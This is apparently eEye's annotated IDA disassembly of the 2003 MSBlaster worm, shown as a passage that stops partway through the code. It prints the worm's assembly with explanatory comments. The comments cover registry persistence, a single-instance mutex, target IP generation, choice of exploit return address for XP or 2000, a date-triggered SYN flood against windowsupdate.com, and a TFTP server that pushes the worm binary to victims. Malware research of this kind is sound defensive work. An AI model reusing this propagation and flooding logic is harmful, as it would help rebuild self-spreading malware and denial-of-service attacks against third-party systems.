.text:00401000 ; .text:00401000 ; +-------------------------------------------------------------------------+ .text:00401000 ; | This file is generated by The Interactive Disassembler (IDA) | .text:00401000 ; | Copyright (c) 2003 by DataRescue sa/nv, | .text:00401000 ; +-------------------------------------------------------------------------+ .text:00401000 ; .text:00401000 ; MSBlaster worm disassembly by eEye Digital Security, Inc., August 12, 2003. .text:00401000 ; .text:00401000 ; Riley Hassell / Barnaby Jack / Ryan Permeh / Derek Soeder / Yuji Ukai .text:00401000 ; .text:00401000 ; Go to function WinMain() at 00401250 for the beginning of the worm code .text:00401000 ; itself. Code before 00401250 and after 00402157 is standard CRT stuff and .text:00401000 ; is therefore not commented. .text:00401000 ; .text:00401000 ; --------------------------------------------------------------------------- .text:00401000 ; File Name : msblast.exe.unpacked .text:00401000 ; Format : Portable executable for IBM PC (PE) .text:00401000 ; Section 1. (virtual address 00001000) .text:00401000 ; Virtual size : 00001458 ( 5208.) .text:00401000 ; Section size in file : 00001458 ( 5208.) .text:00401000 ; Offset to raw data for section: 00000400 .text:00401000 ; Flags 60000020: Text Executable Readable .text:00401000 ; Alignment : 16 bytes ? 
.text:00401000 .text:00401000 .text:00401000 unicode macro page,string,zero .text:00401000 irpc c, .text:00401000 db '&c', page .text:00401000 endm .text:00401000 ifnb .text:00401000 dw zero .text:00401000 endif .text:00401000 endm .text:00401000 .text:00401000 model flat .text:00401000 .text:00401000 ; --------------------------------------------------------------------------- .text:00401000 .text:00401000 ; Segment type: Pure code .text:00401000 ; Segment permissions: Read/Execute .text:00401000 _text segment para public 'CODE' use32 .text:00401000 assume cs:_text .text:00401000 ;org 401000h .text:00401000 assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing .text:00401000 .text:00401000 loc_401000: ; DATA XREF: sub_401020+Avo .text:00401000 xor eax, eax .text:00401002 inc eax .text:00401003 mov ecx, [esp+4] .text:00401007 test dword ptr [ecx+4], 6 .text:0040100E jz short locret_40101F .text:00401010 mov eax, [esp+8] .text:00401014 mov edx, [esp+10h] .text:00401018 mov [edx], eax .text:0040101A mov eax, 3 .text:0040101F .text:0040101F locret_40101F: ; CODE XREF: .text:0040100E^j .text:0040101F retn .text:00401020 .text:00401020 ; =============== S U B R O U T I N E ======================================= .text:00401020 .text:00401020 .text:00401020 sub_401020 proc near ; CODE XREF: .text:0040110Dvp .text:00401020 ; .text:00401138vp .text:00401020 .text:00401020 var_8 = dword ptr -8 .text:00401020 arg_0 = dword ptr 10h .text:00401020 arg_4 = dword ptr 14h .text:00401020 .text:00401020 push ebx .text:00401021 push esi .text:00401022 push edi .text:00401023 mov eax, [esp+arg_0] .text:00401027 push eax .text:00401028 push 0FFFFFFFEh .text:0040102A push offset loc_401000 .text:0040102F push large dword ptr fs:0 .text:00401036 mov large fs:0, esp .text:0040103D .text:0040103D loc_40103D: ; CODE XREF: sub_401020+44vj .text:0040103D ; sub_401020+4Avj .text:0040103D mov eax, [esp+10h+arg_0] .text:00401041 mov ebx, [eax+8] .text:00401044 mov esi, [eax+0Ch] 
.text:00401047 cmp esi, 0FFFFFFFFh .text:0040104A jz short loc_40106C .text:0040104C cmp esi, [esp+10h+arg_4] .text:00401050 jz short loc_40106C .text:00401052 lea esi, [esi+esi*2] .text:00401055 mov ecx, [ebx+esi*4] .text:00401058 mov ecx, [esp+10h+var_8] .text:0040105C mov ecx, [eax+0Ch] .text:0040105F cmp dword ptr [ebx+esi*4+4], 0 .text:00401064 jnz short loc_40103D .text:00401066 call dword ptr [ebx+esi*4+8] .text:0040106A jmp short loc_40103D .text:0040106C ; --------------------------------------------------------------------------- .text:0040106C .text:0040106C loc_40106C: ; CODE XREF: sub_401020+2A^j .text:0040106C ; sub_401020+30^j .text:0040106C pop large dword ptr fs:0 .text:00401073 add esp, 0Ch .text:00401076 pop edi .text:00401077 pop esi .text:00401078 pop ebx .text:00401079 retn .text:00401079 sub_401020 endp .text:00401079 .text:0040107A .text:0040107A ; =============== S U B R O U T I N E ======================================= .text:0040107A .text:0040107A ; Attributes: bp-based frame .text:0040107A .text:0040107A sub_40107A proc near ; CODE XREF: .text:00401100vp .text:0040107A .text:0040107A arg_0 = dword ptr 8 .text:0040107A .text:0040107A push ebp .text:0040107B mov ebp, esp .text:0040107D push ebx .text:0040107E push esi .text:0040107F push edi .text:00401080 push ebp .text:00401081 push 0 .text:00401083 push 0 .text:00401085 push offset loc_401092 .text:0040108A push [ebp+arg_0] .text:0040108D call RtlUnwind .text:00401092 .text:00401092 loc_401092: ; DATA XREF: sub_40107A+B^o .text:00401092 pop ebp .text:00401093 pop edi .text:00401094 pop esi .text:00401095 pop ebx .text:00401096 mov esp, ebp .text:00401098 pop ebp .text:00401099 retn .text:00401099 sub_40107A endp .text:00401099 .text:0040109A ; --------------------------------------------------------------------------- .text:0040109A .text:0040109A loc_40109A: ; DATA XREF: start+10vo .text:0040109A cld .text:0040109B push ebp .text:0040109C mov ebp, esp .text:0040109E sub esp, 8 
.text:004010A1 push ebx .text:004010A2 push esi .text:004010A3 push edi .text:004010A4 push ebp .text:004010A5 mov ebx, [ebp+0Ch] .text:004010A8 mov eax, [ebp+8] .text:004010AB mov dword_404030, eax .text:004010B0 mov dword_404034, ebx .text:004010B6 test dword ptr [eax+4], 6 .text:004010BD jnz short loc_401131 .text:004010BF mov [ebp-8], eax .text:004010C2 mov eax, [ebp+10h] .text:004010C5 mov [ebp-4], eax .text:004010C8 mov dword_404034, eax .text:004010CD lea eax, [ebp-8] .text:004010D0 mov [ebx-4], eax .text:004010D3 mov esi, [ebx+0Ch] .text:004010D6 mov edi, [ebx+8] .text:004010D9 .text:004010D9 loc_4010D9: ; CODE XREF: .text:0040112Bvj .text:004010D9 cmp esi, 0FFFFFFFFh .text:004010DC jz short loc_401140 .text:004010DE lea ecx, [esi+esi*2] .text:004010E1 cmp dword ptr [edi+ecx*4+4], 0 .text:004010E6 jz short loc_401122 .text:004010E8 push esi .text:004010E9 push ebp .text:004010EA lea ebp, [ebx+10h] .text:004010ED call dword ptr [edi+ecx*4+4] .text:004010F1 pop ebp .text:004010F2 pop esi .text:004010F3 mov ebx, [ebp+0Ch] .text:004010F6 or eax, eax .text:004010F8 jz short loc_401122 .text:004010FA js short loc_40112D .text:004010FC mov edi, [ebx+8] .text:004010FF push ebx .text:00401100 call sub_40107A .text:00401105 add esp, 4 .text:00401108 lea ebp, [ebx+10h] .text:0040110B push esi .text:0040110C push ebx .text:0040110D call sub_401020 .text:00401112 add esp, 8 .text:00401115 lea ecx, [esi+esi*2] .text:00401118 mov eax, [edi+ecx*4] .text:0040111B mov eax, [ebx+0Ch] .text:0040111E call dword ptr [edi+ecx*4+8] .text:00401122 .text:00401122 loc_401122: ; CODE XREF: .text:004010E6^j .text:00401122 ; .text:004010F8^j .text:00401122 mov edi, [ebx+8] .text:00401125 lea ecx, [esi+esi*2] .text:00401128 mov esi, [edi+ecx*4] .text:0040112B jmp short loc_4010D9 .text:0040112D ; --------------------------------------------------------------------------- .text:0040112D .text:0040112D loc_40112D: ; CODE XREF: .text:004010FA^j .text:0040112D xor eax, eax .text:0040112F jmp 
short loc_4011A2 .text:00401131 ; --------------------------------------------------------------------------- .text:00401131 .text:00401131 loc_401131: ; CODE XREF: .text:004010BD^j .text:00401131 push ebp .text:00401132 lea ebp, [ebx+10h] .text:00401135 push 0FFFFFFFFh .text:00401137 push ebx .text:00401138 call sub_401020 .text:0040113D add esp, 0Ch .text:00401140 .text:00401140 loc_401140: ; CODE XREF: .text:004010DC^j .text:00401140 push 0 .text:00401142 mov dword_404010, 0Bh .text:0040114C push 0Bh .text:0040114E call signal .text:00401153 add esp, 8 .text:00401156 or eax, eax .text:00401158 jnz short loc_40117B .text:0040115A push 0 .text:0040115C mov dword_404010, 8 .text:00401166 push 8 .text:00401168 call signal .text:0040116D add esp, 8 .text:00401170 or eax, eax .text:00401172 jnz short loc_40117B .text:00401174 mov eax, 1 .text:00401179 jmp short loc_4011A2 .text:0040117B ; --------------------------------------------------------------------------- .text:0040117B .text:0040117B loc_40117B: ; CODE XREF: .text:00401158^j .text:0040117B ; .text:00401172^j .text:0040117B cmp eax, 0FFFFFFFFh .text:0040117E jz short loc_4011AA .text:00401180 push eax .text:00401181 push dword_404010 .text:00401187 call signal .text:0040118C add esp, 8 .text:0040118F push dword_404010 .text:00401195 call raise .text:0040119A add esp, 4 .text:0040119D mov eax, 1 .text:004011A2 .text:004011A2 loc_4011A2: ; CODE XREF: .text:0040112F^j .text:004011A2 ; .text:00401179^j ... 
.text:004011A2 pop ebp .text:004011A3 pop edi .text:004011A4 pop esi .text:004011A5 pop ebx .text:004011A6 mov esp, ebp .text:004011A8 pop ebp .text:004011A9 retn .text:004011AA ; --------------------------------------------------------------------------- .text:004011AA .text:004011AA loc_4011AA: ; CODE XREF: .text:0040117E^j .text:004011AA cmp dword_40402C, 0 .text:004011B1 jnz short loc_4011BA .text:004011B3 mov eax, 1 .text:004011B8 jmp short loc_4011A2 .text:004011BA ; --------------------------------------------------------------------------- .text:004011BA .text:004011BA loc_4011BA: ; CODE XREF: .text:004011B1^j .text:004011BA mov eax, dword_40402C .text:004011BF push 0Bh .text:004011C1 jmp eax .text:004011C3 ; --------------------------------------------------------------------------- .text:004011C3 pop eax .text:004011C4 mov eax, 1 .text:004011C9 jmp short loc_4011A2 .text:004011CB .text:004011CB ; =============== S U B R O U T I N E ======================================= .text:004011CB .text:004011CB ; Attributes: bp-based frame .text:004011CB .text:004011CB public start .text:004011CB start proc near .text:004011CB .text:004011CB var_30 = word ptr -30h .text:004011CB var_18 = dword ptr -18h .text:004011CB var_4 = dword ptr -4 .text:004011CB .text:004011CB mov eax, large fs:0 .text:004011D1 push ebp .text:004011D2 mov ebp, esp .text:004011D4 push 0FFFFFFFFh .text:004011D6 push offset unk_40401C .text:004011DB push offset loc_40109A .text:004011E0 push eax .text:004011E1 mov large fs:0, esp .text:004011E8 sub esp, 10h .text:004011EB push ebx .text:004011EC push esi .text:004011ED push edi .text:004011EE mov [ebp+var_18], esp .text:004011F1 push eax .text:004011F2 fnstcw [esp+30h+var_30] .text:004011F5 or word ptr [esp], 300h .text:004011FB fldcw [esp+30h+var_30] .text:004011FE add esp, 4 .text:00401201 push 0 .text:00401203 push 0 .text:00401205 push offset dword_404028 .text:0040120A push offset dword_404024 .text:0040120F push offset dword_404020 
.text:00401214 call __GetMainArgs .text:00401219 push dword_404028 .text:0040121F push dword_404024 .text:00401225 push dword_404020 .text:0040122B mov dword_404014, esp .text:00401231 call sub_402254 .text:00401236 add esp, 18h .text:00401239 xor ecx, ecx .text:0040123B mov [ebp+var_4], ecx .text:0040123E push eax .text:0040123F call exit .text:00401244 leave .text:00401245 retn .text:00401245 start endp .text:00401245 .text:00401245 ; --------------------------------------------------------------------------- .text:00401246 align 4 .text:00401248 mov large fs:0, eax .text:0040124E retn .text:0040124E ; --------------------------------------------------------------------------- .text:0040124F align 4 .text:00401250 .text:00401250 ; =============== S U B R O U T I N E ======================================= .text:00401250 .text:00401250 ; Attributes: bp-based frame .text:00401250 .text:00401250 WinMain proc near ; CODE XREF: sub_402254+5Cvp .text:00401250 .text:00401250 in = in_addr ptr -3ACh .text:00401250 var_3A8 = dword ptr -3A8h .text:00401250 var_3A4 = dword ptr -3A4h .text:00401250 name = byte ptr -3A0h .text:00401250 WSAData = WSAData ptr -1A0h .text:00401250 szMonth = byte ptr -10h .text:00401250 szDay = byte ptr -0Ch .text:00401250 hKey = dword ptr -8 .text:00401250 ThreadId = dword ptr -4 .text:00401250 .text:00401250 push ebp .text:00401251 mov ebp, esp .text:00401253 sub esp, 3ACh .text:00401259 push esi .text:0040125A push edi .text:0040125B xor esi, esi .text:0040125D .text:0040125D Create/open HKLM\Software\Microsoft\Windows\CurrentVersion\Run .text:0040125D .text:0040125D push 0 ; lpdwDisposition .text:0040125F lea eax, [ebp+hKey] .text:00401262 push eax ; phkResult .text:00401263 push 0 ; lpSecurityAttributes .text:00401265 push 0F003Fh ; samDesired .text:0040126A push 0 ; dwOptions .text:0040126C push 0 ; lpClass .text:0040126E push 0 ; Reserved .text:00401270 push offset aSoftwareMicros ; lpSubKey .text:00401275 push 80000002h ; hKey = 
HKEY_LOCAL_MACHINE .text:0040127A call RegCreateKeyExA .text:0040127F .text:0040127F Create "windows auto update" string value = "msblast.exe" .text:0040127F .text:0040127F push 32h ; cbData (some extra here after null term) .text:00401281 push offset aMsblast_exe ; lpData .text:00401286 push 1 ; dwType = REG_SZ .text:00401288 push 0 ; Reserved .text:0040128A push offset aWindowsAutoUpd ; lpValueName .text:0040128F push [ebp+hKey] ; hKey .text:00401292 call RegSetValueExA .text:00401297 push [ebp+hKey] ; hKey .text:0040129A call RegCloseKey .text:0040129F .text:0040129F Create "BILLY" named mutex to prevent multiple infection .text:0040129F .text:0040129F push offset aBilly ; lpName .text:004012A4 push 1 ; bInitialOwner .text:004012A6 push 0 ; lpMutexAttributes .text:004012A8 call CreateMutexA .text:004012AD call GetLastError .text:004012B2 cmp eax, 0B7h ; 183 (0xB7): mutex already exists .text:004012B7 jnz short loc_4012C0 ; if BILLY mutex does not exist... continue here .text:004012B9 push 0 ; uExitCode .text:004012BB call ExitProcess .text:004012C0 .text:004012C0 Initialize Winsock .text:004012C0 .text:004012C0 loc_4012C0: ; CODE XREF: WinMain+67^j .text:004012C0 lea eax, [ebp+WSAData] ; if BILLY mutex does not exist... 
continue here .text:004012C6 push eax ; lpWSAData .text:004012C7 push 202h ; wVersionRequested (2.2) .text:004012CC call WSAStartup .text:004012D1 or eax, eax .text:004012D3 jz short loc_401304 .text:004012D5 lea eax, [ebp+WSAData] .text:004012DB push eax ; lpWSAData .text:004012DC push 101h ; wVersionRequested (1.1) .text:004012E1 call WSAStartup .text:004012E6 or eax, eax .text:004012E8 jz short loc_401304 .text:004012EA lea eax, [ebp+WSAData] .text:004012F0 push eax ; lpWSAData .text:004012F1 push 1 ; wVersionRequested (1.0) .text:004012F3 call WSAStartup .text:004012F8 or eax, eax .text:004012FA jz short loc_401304 .text:004012FC or eax, 0FFFFFFFFh .text:004012FF jmp loc_401570 ; return .text:00401304 ; --------------------------------------------------------------------------- .text:00401304 .text:00401304 loc_401304: ; CODE XREF: WinMain+83^j .text:00401304 ; WinMain+98^j ... .text:00401304 push 104h ; nSize .text:00401309 push offset Filename ; lpFilename .text:0040130E push 0 ; hModule .text:00401310 call GetModuleFileNameA ; get worm executable's file name (for fopen()'ing later) .text:00401315 .text:00401315 Wait until host is connected to Internet .text:00401315 .text:00401315 loc_401315: ; CODE XREF: WinMain+DEvj .text:00401315 push 0 ; sleep 20 second intervals until connected to Internet .text:00401317 lea eax, [ebp+ThreadId] .text:0040131A push eax .text:0040131B call InternetGetConnectedState .text:00401320 or eax, eax .text:00401322 jnz short loc_401330 ; start at beginning of subnet (x.x.x.0) .text:00401324 push 4E20h ; dwMilliseconds = 20000 (20 seconds) .text:00401329 call Sleep .text:0040132E jmp short loc_401315 ; sleep 20 second intervals until connected to Internet .text:00401330 ; --------------------------------------------------------------------------- .text:00401330 .text:00401330 Get IP address and selectively apply randomization .text:00401330 .text:00401330 loc_401330: ; CODE XREF: WinMain+D2^j .text:00401330 and ds:octet4, 0 ; start 
at beginning of subnet (x.x.x.0) .text:00401337 call GetTickCount .text:0040133C push eax .text:0040133D call srand ; seed random number generator with GetTickCount() .text:00401342 pop ecx .text:00401343 call rand .text:00401348 mov ecx, 0FEh .text:0040134D cdq .text:0040134E idiv ecx .text:00401350 mov edi, edx .text:00401352 inc edi .text:00401353 mov ds:synspoofoctet1, edi ; rand() % 254 .text:00401353 ; make first and second octets of spoofed SYN .text:00401353 ; source address random at first -- if we can't .text:00401353 ; get our local IP, then leave these random; .text:00401353 ; otherwise, replace them with our local IP's .text:00401353 ; first and second octets .text:00401359 call rand .text:0040135E mov ecx, 0FEh .text:00401363 cdq .text:00401364 idiv ecx .text:00401366 mov ds:synspoofoctet2, edx ; rand() % 254 .text:0040136C push 200h ; namelen .text:00401371 lea eax, [ebp+name] .text:00401377 push eax ; name .text:00401378 call gethostname ; get name of local machine for IP lookup .text:0040137D cmp eax, 0FFFFFFFFh .text:00401380 jz loc_401476 ; did gethostname() fail? .text:00401386 lea eax, [ebp+name] .text:0040138C push eax ; name .text:0040138D call gethostbyname ; now that we have machine name, get local IP address .text:00401392 mov [ebp+var_3A4], eax .text:00401398 or eax, eax .text:0040139A jz loc_401476 ; did gethostbyname() fail? .text:004013A0 mov ecx, [eax+0Ch] .text:004013A3 cmp dword ptr [ecx], 0 .text:004013A6 jz loc_401476 ; is *h_addr_list NULL? 
(couldn't get a local IP address) .text:004013AC push 4 ; sizeof(struct in_addr) = 4 .text:004013AE mov eax, [eax+0Ch] .text:004013B1 push dword ptr [eax] ; use ptr to first address in h_addr_list as source .text:004013B3 lea eax, [ebp+in] .text:004013B9 push eax ; dest is &[EBP+in], which is struct in_addr .text:004013BA call memcpy .text:004013BF push dword ptr [ebp+in.S_un] ; in .text:004013C5 call inet_ntoa .text:004013CA push eax .text:004013CB push offset aS ; "%s" .text:004013D0 lea edi, [ebp+name] .text:004013D6 push edi .text:004013D7 call sprintf .text:004013DC push offset a_ ; "." .text:004013E1 lea eax, [ebp+name] .text:004013E7 push eax .text:004013E8 call strtok ; get first octet from IP address string ("." is delimiter) .text:004013ED mov [ebp+var_3A8], eax .text:004013F3 push eax .text:004013F4 call atoi .text:004013F9 mov ds:octet1, eax .text:004013FE push offset a_ ; "." .text:00401403 push 0 .text:00401405 call strtok ; get second octet .text:0040140A mov [ebp+var_3A8], eax .text:00401410 push eax .text:00401411 call atoi .text:00401416 mov ds:octet2, eax .text:0040141B push offset a_ ; "." .text:00401420 push 0 .text:00401422 call strtok ; get third octet .text:00401427 mov [ebp+var_3A8], eax .text:0040142D push eax .text:0040142E call atoi .text:00401433 add esp, 3Ch .text:00401436 mov ds:octet3, eax .text:0040143B cmp eax, 14h .text:0040143E jle short loc_40145F ; third octet <= 20? 
.text:00401440 call GetTickCount .text:00401445 push eax .text:00401446 call srand .text:0040144B pop ecx .text:0040144C call rand .text:00401451 mov ecx, 14h .text:00401456 cdq .text:00401457 idiv ecx .text:00401459 sub ds:octet3, edx ; subtract (rand() % 20) from 3rd octet (if it's > 20) .text:0040145F .text:0040145F loc_40145F: ; CODE XREF: WinMain+1EE^j .text:0040145F mov eax, ds:octet1 ; use first and second octets of local IP for .text:0040145F ; spoofed source address of SYN packets .text:0040145F ; (this code will only be reached if we were .text:0040145F ; able to get the local machine's IP address) .text:00401464 mov ds:synspoofoctet1, eax .text:00401469 mov eax, ds:octet2 .text:0040146E mov ds:synspoofoctet2, eax .text:00401473 xor esi, esi .text:00401475 inc esi ; ESI = 1 .text:00401476 .text:00401476 loc_401476: ; CODE XREF: WinMain+130^j .text:00401476 ; WinMain+14A^j ... .text:00401476 call GetTickCount ; jump ahead to here if unable to get local IP .text:00401476 ; (note that ESI=0 if we jumped here after failing .text:00401476 ; to get our local IP, meaning that, in that case, .text:00401476 ; we'll always randomize the initial target IP) .text:0040147B push eax .text:0040147C call srand .text:00401481 pop ecx .text:00401482 call rand .text:00401487 mov ecx, 14h .text:0040148C cdq .text:0040148D idiv ecx .text:0040148F cmp edx, 0Ch ; EDX = random number from 0..19 .text:00401492 jge short loc_401496 ; ESI=1: 8/20 (40%) chance .text:00401494 xor esi, esi ; ESI=0: 12/20 (60%) chance .text:00401496 .text:00401496 Randomly decide which return address to use in the exploit .text:00401496 80%: dwWhichRetAddr = 1 -- Windows XP address (0100139Dh) .text:00401496 20%: dwWhichRetAddr = 2 -- Windows 2000 address (0018759Fh) .text:00401496 .text:00401496 loc_401496: ; CODE XREF: WinMain+242^j .text:00401496 mov ds:dwWhichRetAddr, 1 .text:004014A0 call rand .text:004014A5 mov ecx, 0Ah .text:004014AA cdq .text:004014AB idiv ecx .text:004014AD cmp edx, 7 ; EDX = 
rand() % 10 .text:004014B0 jle short loc_4014BC ; 8/10 (80%) chance: leave dwWhichRetAddr = 1 (XP ret addr) .text:004014B2 mov ds:dwWhichRetAddr, 2 ; 2/10 (20%) chance: set to 2 (Windows 2000 ret addr) .text:004014BC .text:004014BC 12/20 (60%) chance that the 1st, 2nd, and 3rd octets will be randomized: .text:004014BC 1st: 1..254 .text:004014BC 2nd: 0..253 .text:004014BC 3rd: 0..253 .text:004014BC .text:004014BC loc_4014BC: ; CODE XREF: WinMain+260^j .text:004014BC or esi, esi .text:004014BE jnz short loc_4014FC ; if ESI=1 (40% chance), DON'T randomize first 3 octets .text:004014C0 call rand .text:004014C5 mov ecx, 0FEh .text:004014CA cdq .text:004014CB idiv ecx .text:004014CD mov edi, edx .text:004014CF inc edi .text:004014D0 mov ds:octet1, edi ; (rand() % 254) + 1 .text:004014D6 call rand .text:004014DB mov ecx, 0FEh .text:004014E0 cdq .text:004014E1 idiv ecx .text:004014E3 mov ds:octet2, edx ; rand() % 254 .text:004014E9 call rand .text:004014EE mov ecx, 0FEh .text:004014F3 cdq .text:004014F4 idiv ecx .text:004014F6 mov ds:octet3, edx ; rand() % 254 .text:004014FC .text:004014FC Check date to decide whether or not to SYN flood windowsupdate.com .text:004014FC .text:004014FC loc_4014FC: ; CODE XREF: WinMain+26E^j .text:004014FC push 3 ; cchDate .text:004014FE lea eax, [ebp+szDay] .text:00401501 push eax ; lpDateStr .text:00401502 push offset aD ; lpFormat = "d" .text:00401507 push 0 ; lpDate .text:00401509 push 0 ; dwFlags .text:0040150B push 409h ; Locale .text:00401510 call GetDateFormatA .text:00401515 push 3 ; cchDate .text:00401517 lea eax, [ebp+szMonth] .text:0040151A push eax ; lpDateStr .text:0040151B push offset aM ; lpFormat = "M" .text:00401520 push 0 ; lpDate .text:00401522 push 0 ; dwFlags .text:00401524 push 409h ; Locale .text:00401529 call GetDateFormatA .text:0040152E lea eax, [ebp+szDay] .text:00401531 push eax .text:00401532 call atoi .text:00401537 pop ecx .text:00401538 cmp eax, 0Fh ; if day is after 15th... 
.text:0040153B jg short loc_40154C ; ...then SYN flood windowsupdate.com:80 .text:0040153D lea edi, [ebp+szMonth] .text:00401540 push edi .text:00401541 call atoi .text:00401546 pop ecx .text:00401547 cmp eax, 8 ; ...or month is after August (8)... .text:0040154A jle short loc_401562 ; infinitely call infection loop function .text:0040154C .text:0040154C If day is > 15 or month > 8 (August), create SYN flood thread .text:0040154C .text:0040154C loc_40154C: ; CODE XREF: WinMain+2EB^j .text:0040154C lea eax, [ebp+ThreadId] ; ...then SYN flood windowsupdate.com:80 .text:0040154F push eax ; lpThreadId .text:00401550 push 0 ; dwCreationFlags .text:00401552 push 0 ; lpParameter .text:00401554 push offset WUSYNFloodThread ; lpStartAddress .text:00401559 push 0 ; dwStackSize .text:0040155B push 0 ; lpThreadAttributes .text:0040155D call CreateThread .text:00401562 .text:00401562 Infect sequential IP addresses endlessly, 20 hosts at a time .text:00401562 .text:00401562 loc_401562: ; CODE XREF: WinMain+2FA^j .text:00401562 ; WinMain+317vj .text:00401562 call infect20Hosts ; infinitely call infection loop function .text:00401567 jmp short loc_401562 ; infinitely call infection loop function .text:00401569 ; --------------------------------------------------------------------------- .text:00401569 call WSACleanup .text:0040156E xor eax, eax .text:00401570 .text:00401570 loc_401570: ; CODE XREF: WinMain+AF^j .text:00401570 pop edi ; return .text:00401571 pop esi .text:00401572 leave .text:00401573 retn 10h .text:00401573 WinMain endp .text:00401573 .text:00401576 .text:00401576 ; =============== S U B R O U T I N E ======================================= .text:00401576 .text:00401576 ; Attributes: bp-based frame .text:00401576 .text:00401576 TFTPServerThread proc near ; DATA XREF: infectTarget+39Fvo .text:00401576 .text:00401576 buf = byte ptr -42Ch .text:00401576 name = sockaddr ptr -228h .text:00401576 to = sockaddr ptr -218h .text:00401576 tolen = dword ptr -208h 
.text:00401576 var_204 = word ptr -204h .text:00401576 var_202 = word ptr -202h .text:00401576 var_200 = byte ptr -200h .text:00401576 .text:00401576 push ebp .text:00401577 mov ebp, esp .text:00401579 sub esp, 42Ch .text:0040157F push ebx .text:00401580 push esi .text:00401581 push edi .text:00401582 mov dwTFTPInProgress, 1 .text:0040158C .text:0040158C loc_40158C: ; CODE XREF: TFTPServerThread+16Fvj .text:0040158C push 0 ; protocol = IPPROTO_IP .text:0040158E push 2 ; type = SOCK_DGRAM .text:00401590 push 2 ; af = AF_INET .text:00401592 call socket .text:00401597 mov ds:s, eax .text:0040159C cmp eax, 0FFFFFFFFh .text:0040159F jz loc_4016EA .text:004015A5 push 10h .text:004015A7 push 0 .text:004015A9 lea eax, [ebp+name] .text:004015AF push eax .text:004015B0 call memset .text:004015B5 add esp, 0Ch .text:004015B8 mov [ebp+name.sa_family], 2 .text:004015C1 push 45h ; hostshort = 69 (TFTP) .text:004015C3 call htons .text:004015C8 mov edx, eax .text:004015CA mov word ptr [ebp+name.sa_data], dx .text:004015D1 and dword ptr [ebp+name.sa_data+2], 0 .text:004015D8 push 10h ; namelen .text:004015DA lea eax, [ebp+name] .text:004015E0 push eax ; name .text:004015E1 push ds:s ; s .text:004015E7 call bind .text:004015EC or eax, eax .text:004015EE jnz loc_4016EA .text:004015F4 mov [ebp+tolen], 10h .text:004015FE lea eax, [ebp+tolen] .text:00401604 push eax ; fromlen .text:00401605 lea eax, [ebp+to] .text:0040160B push eax ; from .text:0040160C push 0 ; flags .text:0040160E push 204h ; len .text:00401613 lea eax, [ebp+buf] .text:00401619 push eax ; buf .text:0040161A push ds:s ; s .text:00401620 call recvfrom .text:00401625 cmp eax, 1 .text:00401628 jl loc_4016EA .text:0040162E xor ebx, ebx .text:00401630 push offset aRb ; "rb" .text:00401635 push offset Filename ; 260 (104h) = MAX_PATH .text:0040163A call fopen .text:0040163F add esp, 8 .text:00401642 mov esi, eax .text:00401644 or eax, eax .text:00401646 jz loc_4016EA .text:0040164C .text:0040164C loc_40164C: ; CODE XREF: 
TFTPServerThread+15Dvj .text:0040164C inc ebx .text:0040164D push 3 ; hostshort .text:0040164F call htons .text:00401654 mov edx, eax .text:00401656 mov [ebp+var_204], dx ; TFTP packet format: (all network order) .text:00401656 ; 0000 WORD = 3? .text:00401656 ; 0002 WORD chunk number (starts at 1) .text:00401656 ; 0004 start of data .text:0040165D mov eax, ebx .text:0040165F and eax, 0FFFFh .text:00401664 push eax ; hostshort .text:00401665 call htons .text:0040166A mov edx, eax .text:0040166C mov [ebp+var_202], dx .text:00401673 push esi .text:00401674 push 200h .text:00401679 push 1 .text:0040167B lea eax, [ebp+var_200] .text:00401681 push eax .text:00401682 call fread .text:00401687 add esp, 10h .text:0040168A mov edi, eax ; length actually read .text:0040168C add edi, 4 ; + 4 (for TFTP header) .text:0040168F push [ebp+tolen] ; tolen .text:00401695 lea eax, [ebp+to] .text:0040169B push eax ; to .text:0040169C push 0 ; flags .text:0040169E push edi ; len .text:0040169F lea eax, [ebp+var_204] .text:004016A5 push eax ; buf .text:004016A6 push ds:s ; s .text:004016AC call sendto .text:004016B1 cmp eax, 1 .text:004016B4 jl short loc_4016D8 .text:004016B6 push 384h ; dwMilliseconds .text:004016BB call Sleep ; sleep for 0.9 seconds .text:004016C0 cmp edi, 204h .text:004016C6 jnb short loc_4016D3 .text:004016C8 push esi .text:004016C9 call fclose .text:004016CE pop ecx .text:004016CF xor esi, esi .text:004016D1 jmp short loc_4016D8 .text:004016D3 ; --------------------------------------------------------------------------- .text:004016D3 .text:004016D3 loc_4016D3: ; CODE XREF: TFTPServerThread+150^j .text:004016D3 jmp loc_40164C .text:004016D8 ; --------------------------------------------------------------------------- .text:004016D8 .text:004016D8 loc_4016D8: ; CODE XREF: TFTPServerThread+13E^j .text:004016D8 ; TFTPServerThread+15B^j .text:004016D8 or esi, esi .text:004016DA jz short loc_4016EA .text:004016DC push esi .text:004016DD call fclose .text:004016E2 pop ecx 
.text:004016E3 jmp short loc_4016EA .text:004016E5 ; --------------------------------------------------------------------------- .text:004016E5 jmp loc_40158C .text:004016EA ; --------------------------------------------------------------------------- .text:004016EA .text:004016EA loc_4016EA: ; CODE XREF: TFTPServerThread+29^j .text:004016EA ; TFTPServerThread+78^j ... .text:004016EA and dwTFTPInProgress, 0 .text:004016F1 push ds:s ; s .text:004016F7 call closesocket .text:004016FC push 0 ; dwExitCode .text:004016FE call ExitThread .text:00401703 xor eax, eax .text:00401705 pop edi .text:00401706 pop esi .text:00401707 pop ebx .text:00401708 leave .text:00401709 retn 4 .text:00401709 TFTPServerThread endp .text:00401709 .text:0040170C .text:0040170C ; =============== S U B R O U T I N E ======================================= .text:0040170C .text:0040170C .text:0040170C incrementOctets proc near ; CODE XREF: incrementOctets+68vj .text:0040170C ; infect20Hosts+6Fvp .text:0040170C cmp ds:octet4, 0FEh .text:00401716 jle short loc_401727 ; increment 4th octet and stop if in range [0-254] .text:00401718 and ds:octet4, 0 ; 4th octet rolls over to 0; increment 3rd octet .text:0040171F inc ds:octet3 .text:00401725 jmp short loc_40172F ; stop if octet3 is now in range [0-254] .text:00401727 ; --------------------------------------------------------------------------- .text:00401727 .text:00401727 loc_401727: ; CODE XREF: incrementOctets+A^j .text:00401727 inc ds:octet4 ; increment 4th octet and stop if in range [0-254] .text:0040172D jmp short locret_401776 ; return .text:0040172F ; --------------------------------------------------------------------------- .text:0040172F .text:0040172F loc_40172F: ; CODE XREF: incrementOctets+19^j .text:0040172F cmp ds:octet3, 0FEh ; stop if octet3 is now in range [0-254] .text:00401739 jle short locret_401776 ; return .text:0040173B and ds:octet3, 0 ; 3rd octet rolls over to 0; increment 2nd octet .text:00401742 inc ds:octet2 
